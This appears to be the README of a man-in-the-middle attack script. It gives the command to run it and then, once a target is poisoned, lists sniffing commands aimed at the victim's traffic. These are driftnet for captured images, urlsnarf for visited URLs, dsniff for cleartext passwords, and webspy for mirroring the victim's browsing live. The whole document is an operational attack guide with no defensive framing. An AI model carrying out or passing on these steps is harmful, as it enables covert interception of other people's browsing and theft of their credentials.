# A Simple MitM Script. #


## Usage: ##
**sudo ./mitm.py**

**Screehshot:** 
http://bit.ly/20u54uG
## After Target Poisoned: ##
**Run sniffers in external terminals**

**Note:** *Your local interface may differ*

**1. driftnet -i eth0**

  *driftnet* -- Will capture all image traffic, when victim browse a website.

**2. urlsnarf -i eth0**

  *urlsnarf* -- Captures all victim's website addresses visited by victim's machine. 
   
**3. dsniff -i eth0** 
 
  *dnsiff* -- Sniffs cleartext passwords. Unique authentication attempts.
  
**4. webspy - Start your favorite browser from the command line: e.g. iceweasel**

  *webspy* -- Watches in real-time as the victim surfs, your browser surfs along with them, automagically.

**5. Surf from the victim's machine**

Note: webspy autostart, just run the browser.